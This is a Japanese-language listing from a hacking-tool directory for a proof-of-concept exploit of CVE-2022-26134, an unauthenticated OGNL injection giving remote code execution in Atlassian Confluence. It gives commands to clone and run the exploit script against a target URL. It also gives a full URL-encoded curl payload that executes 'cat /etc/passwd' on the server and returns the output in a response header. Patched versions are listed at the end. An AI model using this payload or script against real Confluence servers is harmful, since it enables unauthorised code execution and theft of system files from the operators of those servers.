Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26134 — [PoC] Atlassian Confluence (CVE-2022-26134) - 未認証のOGNLインジェクション脆弱性(RCE) | Kitploit
ツール/GitHubGitHub/kh4sh3i/cve-2022-26134
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubkh4sh3i/cve-2022-26134

CVE-2022-26134

[PoC] Atlassian Confluence (CVE-2022-26134) - 未認証のOGNLインジェクション脆弱性(RCE)

リポジトリを見る
44年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-26134 - OGNL インジェクションの脆弱性。

影響を受ける Confluence Server および Data Center のバージョンでは、認証されていない攻撃者が Confluence Server または Data Center インスタンス上で任意のコードを実行できる可能性がある OGNL インジェクションの脆弱性が存在します。

PoC:

root@kitploit:~
git clone https://github.com/kh4sh3i/CVE-2022-26134
cd CVE-2022-26134
python3 cve-2022-26134.py https://target.com CMD

CURL コマンドの例:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

その後、コマンドの結果がレスポンスヘッダーの X-Cmd-Response パラメータに反映されます。

修正済みバージョン

リリース済みバージョン 7.4.17、7.13.7、7.14.3、7.15.2、7.16.4、7.17.4、7.18.1 には、この問題の修正が含まれています。

参照

  • confluence
  • jira
ツールをダウンロード